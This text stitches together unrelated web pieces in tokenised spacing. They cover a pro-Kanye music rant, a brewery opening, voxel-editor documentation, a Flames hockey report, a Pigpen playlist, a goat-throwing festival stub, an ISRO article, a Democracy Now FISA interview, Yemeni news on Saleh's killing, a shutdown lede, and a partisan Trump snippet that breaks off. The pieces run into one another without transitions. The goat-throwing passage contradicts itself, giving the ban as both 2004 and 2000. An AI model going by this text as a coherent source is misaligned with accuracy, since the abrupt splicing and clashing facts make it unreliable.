Furthermore , there seems to be an irrational prejudice pouring out that somehow ‘ rock ' is to be privileged over ‘ hip hop ' . Ronnie Wood , despite his efforts , ca n't help but reveal it – ‘ all his swearing'… ? ‘ Cocksucker Blues ' , anyone ? This petition betrays a regressive reactionary attitude to music that is hopelessly wrong-headed . Hip Hop and it 's kin , modern R'n ' B , in the first place is significantly more sophisticated than much of what passes for rock . Secondly , it requires at least as much talent . Admittedly , different instruments – but no-one has yet explained to me why the manipulation of layers of sequencers , samplers , turn-tables etc . needs less talent than some group of sweaty white kids channeling the pub-rock of the Sex Pistols . And certainly , Kanye has done more than most in converting beat-making into an art form . There is a reason why My Beautiful Dark Twisted Fantasy convincingly topped the lists on Metacritic in 2010 , and it 's not because of the haircut he was sporting that year . Finally , while Kanye is not at his most distinguished in the lyrics department , Hip Hop generally speaking is , by and large , leagues ahead of your average rock band .
This petition and the jackasses that have signed it does nothing for music in general and only reveals a lump-headed prejudice that we can live without . When we get down to the bare bones of things , it does n't matter how ‘ hilarious ' Kanye is , is he a great artist when judged by the criteria of that art ? By any meaningful and measurable standard , the answer is yes . Do you need to agree ? No .
Living near to a beer brewing school in Chicago , it 's not surprising that Bill Patterson would brew up his own beer-related plans .
Turner Alley Brewing Company , which Patterson owns , tapped its ceremonial first keg on May 18 at Brick 's Bar & Grill in Cedar Rapids and again on May 19 at Short 's Burger & Shine in Iowa City . On May 28 , all three of the beers will debut on tap at NewBo Alehouse .
The brewery , which will only be a production facility rather than a restaurant , currently offers three types of beers and hopes to serve Cedar Rapids , Iowa City and the surrounding areas .
`` Everything was well attended , the beer came out great , everyone seemed to enjoy themselves so yeah we could n't be happier , '' Patterson said . `` We really want to just be the go-to beer in our backyard . ''
This week 's celebrations are the culmination of an eight-year journey for Patterson . He studied brewing at the Siebel Institute of Technology before moving to Cedar Rapids three years ago . He then met Turner Alley 's current brewmaster and only full-time employee Travis Scheidecker .
`` I shared my ideas with ( Scheidecker ) and we came to the conclusion that there were some beers that maybe were n't being manufactured in this market or produced in this market and we wanted to produce those beers , '' Patterson said .
Patterson said Turner Alley 's first three beers include a mix of `` Old World '' ideas and styles from Europe with ingredients and influences from the United States . The selection includes May 's Island IPA , a rye pale ale called Rising Rapids and a Czech Village Pilsner . Patterson and Scheidecker have plans to develop others .
Although the beer 's influences may be from around the world , the inspiration for the name of Patterson 's brewery came from right here in Cedar Rapids . Turner Alley was named after Iowa artist Grant Wood 's studio t 5 Turner Alley in downtown Cedar Rapids .
`` We feel like art and beer go hand-in-hand together . Beer is art . The parallels are very close between the two , '' Patterson said .
Turner Alley does n't have a tasting taproom . Instead , they 'll offer tours beginning at the end of June by reservation . Tours of the facility will include a tasting and company merchandise .
Turner Alley currently produces kegs for local bars and restaurants , but Patterson said there is a possibility of bottling and packaging in the future .
`` I guess I 'm taking focus on what the end goal is . And that is that we want to be producing the best beers possible in the state of Iowa . and we want to be the best brewery in the state of Iowa , '' Patterson said .
CHEERS FOR BEER
If you love beer , you 're glass should always be half full these days in Eastern Iowa .
On May 21 , Backpocket in Coralville - will introduce the release of their NewBo pilsner beer with a pub crawl through the NewBo district . Each bar - NewBo Market , Brewhemia , Bata 's , NewBo Ale House and Parlor City - will have NewBo on tap along with another Backpocket special release . The event is free .
Millstream will tap its Backbeat Pils on Saturday . The beer is a collaboration between Millstream brewer Chris Priebe and Trevor Schellhorn , the head brewer at Broad Street Brewery in Reinbeck . Both musicians , they decided to brew up a band as well , which will perform at the event at 4 p.m .
There 's a Beer 101 class at the National Czech & Slovak Museum & Library on May 30 as part of their Year of Beer programming .
Also on May 30 is Backpocket Brewing 's Border Hop from 1 to 4 p.m . The beer tasting series features craft beers from around the bordering Midwest states .
Cheers !
: : Navigator Always present at the bottom right of the screen is the navigator . This allows you to browse and manage resources like models and actors . There are five tabs ; the model and objects tabs are for objects that belong to the level , and the last two ( actors/items ) are fixed internal objects that can not be edited . To open a folder : double-click ( or select and click the open button ) To edit an item : control-click ( or select and click the edit button ) To set the cursor position in a tab : click between objects To select an item : click on it To select multiple : hold shift To move selected items : click and drag , either to a cursor position ( insert ) or to another item ( drop at that absolute position ) To move selected items between folders : Ctrl-C/Ctrl- > X/Ctrl-V Check the descriptions on the navigator buttons to see which operations are possible . If an operation can not be performed ( e.g . loading an item into a read-only folder ) it will be greyed out . Special objects such as animations are actually just folders . To see the contents of the object ( e.g . animation frames ) , just double-click on it as you would a folder . To edit the properties of the animation , click the edit button OR click on the object 's button in the crumb navigation ( animation show up as orange ) Navigator operatios ( move , cut , delete etc . ) can be undone and redone as usual , but the undo stack is cleared when the navigator loses focus . To check if something can be undone , look at the UNDO/REDO buttons at the top right . If they apply to a navigator operation , the icon changes to include a little grid of squares to indicate this ) . The new style of resource management ( from 0.2.2 ) is still a work in progress . There are some left-over relics ; custom players still need to use the default folder 6 . If something weird happens , please let me know ( joseph @ lexaloffle.com ) or post about it on the BBS . It should be pretty stable , but you should back up more than usual until 0.3 ! : : Animations Animations can be played in the room like props , but do not interact with the player or any other actors . They are useful for things like ambient scenery . You can create an animation by first creating a new object ( PROP ) and then selecting TYPE : ANIMATION . Workflow looks something like this : - create an animation - give it a name ( e.g . `` Tree '' ) - double-click the new object to open it ( animations are like folders ) - add a new frame ( `` Add New Item '' button ) and choose a size you like - add some more frames ( they will inherit the same size ) - draw something - click on the animation 's organge item button to edit properties Animation properties : Duration : How many world frames to play the animation for . The world runs at 120fps , so 240 would display the animation for 2 seconds . Use zero to play forever . Frame Length : How many world frames to show each animation frame for . e.g . 15 would display 8 animation frames per second ( 120/15 ) . Play Style : Loop the animation forever or play through once . If you use `` play once and hold '' , the last frame is held until the animation expires . Paint Mode : How to draw the animation into the frame . Paint solid only draws onto map voxels that are solid ( e.g . an animation drawn onto a tv screen that disappears as the tv is destroyed ) . Paint empty only draws onto map voxels that are empty ( e.g . a curtain that should n't intersect the player ) . Random Staring Frame : Choose a random starting frame to stagger the animation . For example , if you 're making a single blade of grass blowing in the wind , you probably do n't want it to be syncronised with ever other blade of grass . Draw in Screen Space : Always draw at the same part of the screen , no matter where the room camera is . Not so useful yet , but can be used for things like story overs , or room titles that introduce a location . : : Exporting Use the console to export models or in-game screenshots . To bring up the console in-game , hold down both shift keys . useage : export [ filename ] Format is guessed from extension : obj , png , txt , pov e.g . blah.txt will be saved as raw data in a text file . File ( s ) are saved into the most recent voxde directory . obj : A wavefront .obj/.mtl pair are saved . png : A set of slices are saved as a single png Include ' % d ' somewhere in the filename to split into one png per slice . pov : A POV-Ray description is saved with some default lighting txt : A text file with raw values is saved : file_version width height depth r g b // x 256 lines . one for each palette entry raw voxel data , 40 space-separated decimals per line
EDMONTON – From a bad-looking situation , Jonas Hiller managed to find a silver lining .
He was still loose from the warmup .
So if there had been a bright side to Karri Ramo 's opening-minute departure , as unsettling as that sight might have been , this was it – the replacement still had a sweat on .
“ It was nice . ”
Nice and , as it turns out , perfect .
Because Hiller , to his credit , has rarely looked sharper – playing 59:02 , stopping all 27 pucks the Edmonton Oilers hurled his direction , leading the Calgary Flames to a 4-0 win in National Hockey League action Saturday at Rexall Place .
“ Jonas Hiller came in – what a clutch performance , ” said coach Bob Hartley . “ As soon as he got in , he made three , four big saves in a row . I think that 's the turning point of the game right there . Even though it was real early , Hills came out and was real strong for us . ”
Favouring his left side , Ramo had dropped to the ice . Then , helped up , he went directly out the chute behind the Calgary net .
Hiller dropped in , right off the bat defused a bang-bang sequence from the keen hosts , then watched as his teammates went down the ice and scored .
Joe Colborne 's goal , 1:59 , stood up as the winner .
“ From one second to the next , you have to change your mindset , ” Hiller said of relieving Ramo . “ From being a spectator , you 're suddenly the goalie out there . It was n't easy , but it worked out well .
“ It 's been like that the whole year . If I get the chance , I love to play . ”
Meanwhile , Ryan Demharter was hustling madly across the city .
Demharter had been enjoying a night out with his girlfriend , having supper at Brewsters in the west side of Edmonton and watching hockey on television . So he saw Ramo hobble off the ice . That was surprising .
So was the call he received 10 minutes later . It was his University of Alberta Golden Bears manager Stan Marple telling him to report to Rexall Place immediately to serve as the Flames ' backup .
No fool , Demharter refused to believe the offer .
“ I thought they were kidding , ” said the 25-year-old native of Spruce Grove , Alta . “ There are three Bears goalies , and two of them happened to be out of town . So I was next in the pecking order . ”
Finally convinced , he raced to the U of A to fetch his gear , then rushed to the rink in time for the second period . He suited up , tugged on a No . 70 jersey , and sat in the visitors ' dressing room – waiting .
“ They said , ‘ Hang out here for now . If we need you we 'll let you know , ' ” said Demharter . “ If it happened , it happened . But I was n't hoping for anyone else to get injured , that 's for sure .
“ It was pretty neat . They were all very accommodating , all very nice . They were n't mean in any way . A great group of guys . ”
All Hartley , post-game , would say about Ramo was that he suffered a lower-body injury .
If you 're wondering , Adirondack 's goalies – with Joni Ortio sidelined by a high ankle sprain – are Brad Thiessen and Doug Carr .
So Hiller played hero Saturday .
But there were contributors beyond him , of course .
Like Dennis Wideman 's one goal and two assists , which boosted his season 's total to 52 – a personal high .
Like Markus Granlund 's two goals as part of a peskily efficient line with fellow rookies Josh Jooris and Michael Ferland .
“ They gave us quite a game , ” said Hartley . “ They were on the puck . Their forechecking was great . They were buzzing with the puck . They were around the net all night . Defensively , they were very strong . Here are three kids who were not with us at the start of the year .
“ They played a big part in tonight 's win . ”
The Flames finish their five-game road trip with a 3-2-0 record and match a franchise standard for road wins , with 22 ( 1987-88 , 1988-89 ) .
Next up for the Calgarians – Tuesday 's visit from the Arizona Coyotes .
Which may mark the debut of Sam Bennett , who joined the team after his junior outfit , the Kingston Frontenacs , was eliminated from the Ontario Hockey League post-season .
Hartley had offered no morning-skate assurances about Bennett 's deployment , but the 18-year-old is certainly keen .
“ Yeah , I 'm super-excited , maybe a little nervous , to possibly get the chance to play my first NHL game , ” Bennett said before the contest . “ It 's what I 've wanted since I can remember . I 'm excited to see what ( Hartley ) says close to game time . I 'm thrilled to be here .
“ I 'm excited to finally get my chance . It 's awesome to be here . It really is an unbelievable opportunity . I 'm honoured to be here and possibly get the chance to play soon . ”
C-NOTES :
The Herald 's Three Stars
1 . Calgary G Jonas Hiller
2 . Calgary D Dennis Wideman
3 . Calgary C Josh Jooris
Flame scratches – D Tyler Wotherspoon , C Sam Bennett , C Drew Shore , LW Brandon Bollig , D Mark Giordano ( biceps ) , D Ladislav Smid ( neck ) , D Raphael Diaz ( unspecified ) , C Paul Byron ( lower body )
Prospect G Mason McDonald , the first goalie taken at the 2014 draft , has been drydocked by a knee injury . The QMJHL Charlottetown Islanders ' starter is going to be soon examined by Flames doctors
Prospect G Jon Gillies plays in the NCAA Frozen Four 's semifinal Thursday . The championship game , in Boston , goes Saturday . A junior at Providence College , he 's sure to be offered a contract by the Flames .
scruickshank @ calgaryherald.com
When I first met the Grateful Dead , it was Pigpen and the boys .
March 9 , 2016
“ Pigpen was the musician in the Grateful Dead . When I first met the Grateful Dead , it was Pigpen and the boys . It was a blues band… Pigpen was a kind man . He looked so hard , but he was a kind , soft man . That 's why he had to look so tough , because he was so kind , he would get stepped on… ''
~Mickey Hart
Ron “ Pig Pen ” McKernan was born on September 8 , 1945 in San Bruno , California . His contributions to the Dead included vocals , keyboards , harmonica , percussion , and guitar . The son of a Bay Area R & B and blues disc jockey , McKernan grew up in a predominantly black area and found a bond with the black music and culture . McKernan began hanging around coffeehouses and music stores where he eventually met Jerry Garcia . One night Garcia had McKernan hop on-stage and play his harmonica and sing the blues . Garcia was sold : He knew he wanted the man he now called Pig Pen to be the blues singer in all the local jam sessions .
Pig Pen was a participant in all incarnations of the Dead , beginning with the Zodiacs and then Mother McCree 's Uptown Jug Champions . Bob Weir and Bob Matthews were added to the mix and evolved into the Warlocks . In fact , around 1965 , it was Pig Pen who was urging the rest of the Warlocks to go electric around the time Phil Lesh would join and they became the Grateful Dead .
Read the original article here :
In celebration of his life and music enjoy this best of Pigpen playlist originally posted here :
‘ Ai n't It Crazy ( The Rub ) '
From : ‘ Ladies and Gentlemen… the Grateful Dead ' ( 2000 )
Pigpen 's penchant for old blues tracks perhaps inevitably led him to this chugging Lightnin ' Hopkins tune — which goes all the way back to a pre-Dead configuration in 1964 called Mother McCree 's Uptown Jug Champions . The Grateful Dead , as they came to be called in 1965 after Bob Weir and Bill Kreutzmann joined , would make ‘ Ai n't It Crazy ' a concert staple in 1970-71 . This take comes from a April '71 concert at New York City 's Fillmore East . Listen To ‘ Ai n't It Crazy '
‘ Big Boss Man '
From : ‘ The Grateful Dead ' ( 1971 )
Pigpen adds a gruff melancholy to this classic Jimmy Reed cover , as part of the Dead 's second double-live album — and second eponymously titled project . Then he switches over to a gnarly harp to give things another layer of greasy goodness . Listen To ‘ Big Boss Man '
‘ Smokestack Lightning '
From : ‘ History of the Grateful Dead , Volume One ' ( 1973 )
Bob Weir revived this track in the '80s and '90s , but it originally served as a rambling excursion for Pigpen , best heard on this February 8 , 1970 night at the Fillmore West in San Francisco . Where Howlin ' Wolf once approached ‘ Smokestack Lightning ' with a braying bravado , Pigpen — and his ruminative band of confederates in the Dead — let the song unspool into a somnolent gait … then stuck with it for more than 14 glorious minutes . Listen To ‘ Smokestack Lightning '
‘ Hurts Me Too '
From : ‘ Ladies and Gentlemen… the Grateful Dead ' ( 2000 )
This song retains an indelible connection to Pigpen , after the Grateful Dead regularly performed it from 1966-72 — and then never again after his death . First recorded in a slightly different form by Tampa Red , ‘ Hurts Me Too ' first came to wide fame via an Elmore James version from 1957 . Pigpen 's trembling take seems to owe just as much to Junior Wells ' electrifying update , which followed in 1962 . Listen To ‘ Hurts Me Too '
‘ Mr . Charlie '
From : ‘ Europe '72 ' ( 1973 )
A rollicking collaboration between Pigpen and Hunter , ‘ Mr . Charlie ' arrived courtesy of the final tour before McKernan became too ill to continue with the band . It was recorded during a May 23 , 1972 date at London 's Lyceum Theatre , and released in November of the same year as part of a triple-album concert package . Pigpen died on March 8 , 1973 , at just 27 . Listen To ‘ Mr . Charlie '
‘ Hard to Handle '
From : ‘ History of the Grateful Dead , Volume One ' ( 1973 )
‘ Hard to Handle ' was a coiled highlight from the Dead 's Fillmore East shows on February 13 and 14 , 1970 , and then a cornerstone of this 1973 album constructed after Pigpen 's death . Careful listeners will recognize it , too , as the connective moment between Otis Redding 's original and the Black Crowes ' subsequent version . Listen To ‘ Hard to Handle '
‘ Good Morning Little School Girl '
From : ‘ The Grateful Dead ' ( 1967 )
A crossover song that originally bridged the country- and city-blues epochs , this Sonny Boy Williamson composition would no doubt be considered far to risque for wide release these days . That said , Pigpen — singing ‘ Good Morning ' for the Grateful Dead 's self-titled debut — gives the vocal a deliciously , unforgettably lecherous feel . Listen To ‘ Good Morning Little School Girl '
'Easy Wind '
From : ‘ Workingman 's Dead ' ( 1970 )
There 's a hard-working , hard-drinking feel to ‘ Easy Wind , ' in keeping with the 1970 project 's title — and Pigpen 's shaggy-haired So Co-swilling persona . He gives a melancholy ache to the lyric on this Hunter-penned original , which finds our protagonist looking for a woman who “ wo n't hide my liquor , try to serve me tea. ” Listen To ‘ Easy Wind '
‘ Turn On Your Love Light '
From : ‘ Live/Dead ' ( 1969 )
Pigpen and the Grateful Dead got the closest that anyone ever did to swiping ‘ Turn on Your Love Light ' from its best-known interpreter , Bobby “ Blue ” Bland . And they did it by pushing and pulling on this song until it became something else entirely . Their version on ‘ Live/Dead , ' the first of countless concert recordings for the band , was 15 minutes long . The one at Woodstock reportedly lasted more like 45 minutes . Listen To ‘ Turn on Your Love Light '
Celebrated on the fourth Sunday of January , Goat throwing ( in Spanish : Lanzamiento de cabra desde campanario or Salto de la cabra ) was a festival in Manganeses de la Polvorosa , province of Zamora , Spain where a group of young men threw a live goat from the top of a church based on local legend . A crowd below would then catch the falling goat with a canvas sheet . In 2004 it was banned against animal rights and since then , toy goats have been used . Animal rights groups demanded the end of this festival several times , [ 1 ] [ 2 ] until the practice was banned in 2000 . The legend states that a goat , which miraculously fed the poor with its milk , fell out of the tower , but landed safely . [ 1 ] A toy plush goat was thrown in the 2014 celebration . [ 3 ]
See also [ edit ]
While future engines and launch vehicles get ready , its old workhorse PSLV will launch a series of novel satellites in orbit . The next PSLV flight — in March — will put the fourth satellite of the Indian Regional Navigation Satellite System ( IRNSS ) into orbit . Three more such satellites are to follow IRNSS 1D , thus completing a network with considerable strategic value to the country . PSLV will have a commercial launch too this year , with foreign satellites , and another one to put the Astrosat into orbit roughly over the equator . This satellite will orbit at an altitude of 650 km for five years , thereby augmenting domestic space engineering capability for scientific research.Astrosat , has been in the works for over a decade . The Tata Institute of Fundamental Research ( TIFR ) developed three of its five payloads , some of which were quite complicated to build . One instrument , the soft X-ray telescope , took 11 years to build . TIFR has now completed building all the instruments and handed them over to ISRO , which has begun the integration at Bangalore . It will be the world 's only multiwave astronomy satellite , another one from NASA having ended its life some time ago.Astrosat has multiple imaging methods : ultraviolet , soft X-ray and hard X-rays . `` It is a general purpose satellite that can be used for many different studies , '' says KP Singh , professor at TIFR , who was closely involved in its development . Astronomers like Singh will use it for a variety of research . It will look at black holes in the galaxy and beyond . It can look at clusters of galaxies not discovered so far . It can look at stars and exclude those that can not have planets with life . Astronomers can propose an experiment that will be examined by a team ; data from the experiment will be open after about 18 months.All the five payloads of the Astrosat are now in the clean room and are being assembled . The full satellite will be ready in one month , and tested for another three months . It will be ready for launch by July , and could go up by August . `` Everybody in ISRO and the astronomy community is looking forward to the Astrosat , '' says SK Shivkumar , director of ISRO Satellite Centre in Bengaluru . It will involve expansion of space applications for ISRO.So will be the next lunar mission , for which ISRO is developing a rover , a lander and an orbiter . Unlike the previous mission , Chandrayaan-2 can not be launched by the PSLV . This is because it has a payload supposed to be 2.25 tonne , well outside the capabilities of PSLV-XL . Chandrayaan-1 had a weight of 1.3 tonne . GSLV is supposed to have a few more flights before Chandrayaan-2 , and would probably be looked at as a reliable vehicle.Chandrayaan-2 was planned as a joint project between India and Russia , with Russia developing the moon lander , but the Russians withdrew citing technical reasons . ISRO then decided to develop the rover on its own . The spacecraft is being designed and a six-wheeled rover has been designed already . `` It has shaped well , '' says Shivkumar . ISRO has had a review recently . The launch is expected to happen sometime in July 2018 .
After that , apart from building routine satellites , ISRO has another major mission in mind : Aditya 1 , or a satellite to look at the sun . This is to be located in between the earth and the sun , at a point called Lagrangian Point , where it is supposed to remain for all of its life . There are technical issues , not th least of which is the stability of the satellite at the Lagrangian Point . Understanding how the satellite will behave there is a tough problem . Considering the current ambitions of ISRO , even tougher problems would follow in future .
Star Power
ISRO has its hands full with new projects , some of which pushing up the potential use of space technology significantly . These include new heavy launch vehicles , cryogenic and semi-cryogenic engines , a moon and a solar mission and , if there is enough government support , human space missions as well . Plus , you have air-breathing and reusable launch vehicles . And the turnaround seems to be complete.A set of seven navigation satellites that will be controlled by the government . The PSLV has been launching three of them through last year , and four more need to be launched in the first half of this year for the constellation to be complete . It will give India a full network of global positioning satellites for both civilian and military use.To be launched later this year , the Astrosat will satisfy a long-standing need among India 's astronomy community . The onboard equipment has mostly been built at the Tata Institute of Fundamental Research ( TIFR ) with ISRO chipping in with some parts . It is a general purpose astronomy satellite capable of investigating a wide range of astronomical phenomena.One of ISRO 's most challenging tasks is to develop a vehicle capable of launching 4-tonne satellites into geostationary orbit . The current GSLV can go up to 2.2 tonnes . GSLV Mark III , which has completed one flight with a dummy upper stage , has to wait for another two years for the full cryogenic stage to be developed . It is also to be developed as a human-rated vehicle later.India had built its own cryogenic engine based on a Russian design , but neither the Indian nor the Russian engines have enough thrust to put a 4-tonne satellite into orbit . The completely indigenous cryogenic engine , now under development , will have three times the thrust and can put 4 tonnes satellites into orbit . It is being tested , and complete delivery will take 2 more years.After the success of the moon orbiter ( Chandrayaan I ) , ISRO is now developing a moon rover ( Chandrayaan II ) . It has two parts ; the rover and the orbiter . The rover will land softly and explore lunar soil , while the orbiter will take this data and relay it to the earth . Chandrayan II is not likely to have payloads from other countries . The launch time will be some time around two years from now.What was accomplished in the past three years : First fully successful GSLV flown in January 2014First successful flight test of indigenous cryogenic engine , also in Jan 2014Mars mission conceived and executed to perfection , from Nov 2013 to Sept 2014Successful sub-orbital flight of GSLV Mark III , along with the safe recovery of crew moduleWhat is expected in the next three years : Completion of navigation satellite system launches this yearDevelopment and launch of Astrosat , a unique general purpose astronomy satellite , also this yearDevelopment of new and indigenous cryogenic engine , by next year-endAt first sight , Antrix Corporation hardly looks like an entity with a business in excess of Rs 1,000 crore . It has a small office , a smaller set of staff and a bunch of contracts that could keep a larger company busy round the clock . It had revenues of Rs 1,608 crore last year , and its aim is to increase it three times in the next five years . All it needs to achieve this aim is to make a few adjustments in its operation.And yet it is wrong to look at Antrix through the lens of a private enterprise . Its aim is not to build a profitable and full-fledged business but to market ISRO 's spare capacity.This amounts to one dedicated PSLV launch , a few more launches on piggyback , leasing of transponders and sale of remote sensing data . It is now looking at another opportunity : satellite manufacturing.Its bread and butter , leasing of transponders , has limitations to growth . ISRO may not always have spare capacity of transponders , especially if the applications within the government grow significantly . Satellite manufacturing is a good business to be in , as there is an enormous need around the world to build new kinds of satellites . Sale of remote sensing data can also expand , as the potential uses are significantly large.The use of space technology is going through an expansion around the world . The global satellite industry alone is around $ 200 billion , with the field active with venture capital investments and technology start-ups . More than 1,000 satellites already orbit the earth . More and more are being launched , many of them so tiny that they can fit in the palm of your hand . The industry is also remarkably innovative . From the outside , competition seems intense.Consider SpaceX , the company floated by Elon Musk . Currently it is offering some of the cheapest launches in the world , undercutting everybody . Antrix is not affected as SpaceX is not in the PSLV space , but ISRO will be ready with the GSLV and compete head to head with SpaceX at some point.Startups are coming with regularity in remote sensing , or earth observation as it known these days . SkyBox , the company Google acquired and whose satellite ISRO itself is going to launch , is an innovative earth observation company , with the capacity to provide images of any point that is not more than a few hours old at any time.Urthecast , a Canadian startup with some clever technologies , is another challenger . Many other established players operate in earth observation , and yet the market does not look crowded . “ I do not like the word competition in earth observation , ” says VS Hedge , managing director of Antrix . “ The potential is so large that I would use the world complement. ” Over the years , Antrix plans to use ISRO 's earth observation system to augment its revenues . In the long run , Antrix launch services expansion is limited by domestic priorities and lack of good manufacturing facilities outside ISRO . Would India set up a flourishing private space manufacturing industry ? Europe 's consortium that launches Arianne rockets is a good example to follow .
This is a rush transcript . Copy may not be in its final form .
AMY GOODMAN : House and Senate Democratic leaders are reportedly preparing to cave in to threats by President Bush and grant some form of immunity to the telecommunications companies that helped the government spy on Americans . The compromise bill would also expand government authority to eavesdrop on the international phone calls and email messages of US citizens without warrants .
House Democrats had let the temporary surveillance law expire last month rather than back a new law approving the telecom immunity . The Bush administration has fiercely lobbied for granting immunity to companies that helped government spying . In a speech before the National Association of Attorneys General Monday , President Bush said Americans should thank the telecom companies for providing what he called “ a patriotic service . ”
PRESIDENT GEORGE W. BUSH : There are a lot of legal complexities on the FISA renewal debate , but the real issue comes down to this : to defend the country , we need to be able to monitor communications of terrorists quickly and be able to do it effectively . And we ca n't do it without the cooperation of private companies . Now , unfortunately , some of the private companies have been sued for billions of dollars , because they are believed to have helped defend America after the attacks on 9/11 .
Now , the question is , should these lawsuits be allowed to proceed , or should any company that may have helped save American lives be thanked for performing a patriotic service ? Should those who stepped forward to say we 're going to help defend America has to go to the courthouse to defend themselves , or should the Congress and the President say thank you for doing your patriotic duty ? I believe we ought to say thank you .
AMY GOODMAN : Glenn Greenwald is a constitutional law attorney and political and legal blogger for Salon.com , author of A Tragic Legacy : How a Good vs . Evil Mentality Destroyed the Bush Presidency . He joins me on the phone right now .
Can you talk about this legislation that could well be passed in the next two days ?
GLENN GREENWALD : Sure . The legislation is exactly what the White House drafted along with Jay Rockefeller . It grants a vast new authority to the President to eavesdrop on the conversations and spy on the emails of Americans without warrants of any kind , and it grants full-fledged immunity to the telecommunication companies that broke the law for years by allowing spying on American citizens . That 's the bill that the Senate passed and that the House looks almost certain to pass now .
AMY GOODMAN : What 's changed ? Why is the House caving ?
GLENN GREENWALD : Well , I think it was clear from the beginning that the House refused to pass the bill in time for the deadline , not because they care about warrantless eavesdropping or the rule of law , but just because they were a little bit upset that they were n't given as much time as they wanted . They were — had the bill dropped in their lap and told they only had a couple of days to pass it . They were really angry at the Senate , not at the White House . And so , they threw a little tantrum , and they said , you know , we 're not going to capitulate within a matter of a couple days ; we want a few weeks in order to capitulate to the President . And they were always willing to pass the bad bill , but what they did was they picked this , you know , very dramatic fight , subjected their members to all kinds of attack ads , always at the intention of surrendering at the end . There were really just defending these procedural customs about not being pressured into doing it . They were never defending the substance that 's at stake .
AMY GOODMAN : And what exactly , if this bill is passed , will it mean , Glenn Greenwald ?
GLENN GREENWALD : Well , it 'll mean that all of the lawsuits that exist now against the telecommunications company that the customers have been winning in court , on the grounds that what the telecoms did was legal , will all be — disappear . They 'll just go away forever . And because Congress has n't investigated what the President has done , and because the media has been virtually inactive in doing so , that 'll mean that the last hope for finding out how the Bush administration spied on us for all those years will be just completely abolished , and we 'll lose the ability to find out what our government did for all those years in breaking the law and in spying on us . That 's the real reason the White House wants this bill , and that 's what the Congress is about to do , is to hand the President the ability to conceal that behavior for years and years and years .
AMY GOODMAN : Glenn Greenwald , thanks very much for joining us . His book is called A Tragic Legacy : How a Good vs . Evil Mentality Destroyed the Bush Presidency . He blogs for Salon.com .
The son of ex-Yemeni president Ali Abdullah Saleh has called for retaliation against the Iran-linked Houthi rebels who killed the former leader , accusing him of “ treachery ” for offering to “ turn a new page ” with the Saudi Arabia-led coalition fighting the Shiite insurgents in Yemen .
“ I will lead the battle until the last Houthi is thrown out of Yemen … the blood of my father will be hell ringing in the ears of Iran , ” Saudi-owned al-Ekhbariya TV quotes the former president 's son Ahmed Ali Saleh as saying , reports Reuters .
The son also reportedly urged his father 's supporters to “ take back Yemen from the Iranian Houthi militias , ” suggesting that he also abandoned his allegiance to the Shiite insurgents .
Reuters acknowledges that it could not immediately verify the authenticity of Ahmed Saleh 's comments to the Saudi-owned TV channel .
On Saturday , the late Saleh expressed a willingness to “ turn a new page ” with the Saudi Arabia-led Sunni coalition if it stopped targeting Yemen and ended its devastating blockade of the country .
In response , the Iran-allied Houthis accused their former ally Saleh of a “ coup ” against “ an alliance he never believed in . ”
Soon after storming his house on Monday , the Houthis announced the former president 's deaths .
Sunni Saudi Arabia and Shiite Iran are regional enemies .
Yemen , considered the poorest country in the Middle East even before the conflict , is home to one of the most violent proxy wars between the two nations , pitting the internationally recognized government of Yemeni President Abdrabbuh Mansur Hadi and his allies against the Houthis and their partners .
Ahmed Saleh , a former leader of the elite Republican Guards , has been in exile in the United Arab Emirates ( UAE ) , a country that supports the Saudi Arabia-led coalition fighting against the Houthis to restore Hadi to power since March 2015 .
Until recently , the late Saleh and his supporters were combating Hadi and the Saudi-led coalition alongside the Houthis .
The Saudi-led coalition officially entered the Yemen war in early 2015 , soon after the Shiite rebels pushed the Hadi administration out of the Yemeni capital Sanaa .
In acknowledging Saleh 's death , the Sanaa-based Houthi interior ministry described the murder as “ the killing of the leader of treachery and a number of his followers . ”
Abdul Malik al-Houthi , the Houthi insurgents ' chief , accused Saleh of working with the Saudi-led coalition and hailed the killing of his former ally as a “ great and significant occasion . ”
Following a dispute over control of Sanaa 's biggest mosque last Wednesday , clashes erupted in Sanaa between the ex-president 's supporters and the Houthi militants .
The fighting resulted in 234 people killed and an estimated 400 injured , including 382 seriously wounded , wrote Robert Mardini , the International Committee of the Red Cross ( ICRC ) director for humanitarian assistance in the Middle East , on Twitter :
Terrible human cost from recent fighting in # Sanaa : 234 killed & 400 wounded ( 383 severely injured ) . ICRC-supported facilities received close to 70 % of all casualties . Our @ ICRC_ye teams are now doing all they can to supply hospitals with medicines , surgical materials and fuel . — Robert Mardini ( @ RMardiniICRC ) December 5 , 2017
Saleh 's decision to try and reach a compromise with the Saudi-led coalition also fueled the battles between his supporters and the Houthis .
Reuters reports :
[ T ] he Houthis swiftly crushed a pro-Saleh uprising in the capital and shot him dead in an attack on his convoy . Tens of thousands of Houthi supporters staged a rally in the capital on Tuesday to show support for their leader and celebrate the death of Saleh . They chanted slogans against Saudi Arabia and its allies .
According to the United Nations , the unrest in Sanaa had subsided by Tuesday , which is when Saleh 's funeral is expected to take place .
The war in Yemen has exacerbated what the United Nations describes as the world 's worst humanitarian crisis—reportedly fueled by one of the most terrible famines of modern times and the preventable scourge of cholera that has already killed more than 2,200 people , among other diseases afflicting the Yemeni population .
Although hunger and disease are expected to intensify and kill thousands , the warring parties have been blocking food and aid from entering Yemen , which has historically been mostly dependent on imported food and other supplies .
The death of the former Yemeni president further complicates the ongoing war in the Middle Eastern country .
“ We expect things will get worse for us . This will be the beginning of a new conflict and more bloodshed . The war will not end soon , ” Aswan Abdu Khalid , an academic at the University of Aden in Yemen , told Reuters .
WASHINGTON — The Senate is expected to reject decisively a House bill that would delay the full effect of President Obama 's health care law as a condition for keeping the government running past Monday , as Senator Harry Reid , the Democratic majority leader , expressed confidence that he had public opinion on his side .
Angering Republicans who lead the House , Mr. Reid kept the Senate shuttered on Sunday , in a calculated move to stall action on the House measure until Monday afternoon , just hours before the government 's spending authority runs out at midnight .
Without a complete capitulation by House Republicans , large sections of the government would close , hundreds of thousands of workers would be furloughed without pay , and millions more would be asked to work for no pay .
Polls show that the public is already deeply unhappy with its leaders in Congress , and the prospect of the first government shutdown in 17 years would be the latest dispiriting development . With a temporary shutdown appearing inevitable without a last-ditch compromise , the battle on Sunday became as much about blaming the other side as searching for a solution .
Ouch ! … Trump to Part-Timer Hillary Clinton : “ Sleep Well , Hillary ! ”
Donald Trump poked Hillary Clinton today on Twitter telling her to “ sleep well ” and “ see you at the debate . ”
Hillary has a light schedule until the presidential debate next week with Donald Trump .
She needs her rest .
Infowars reported :
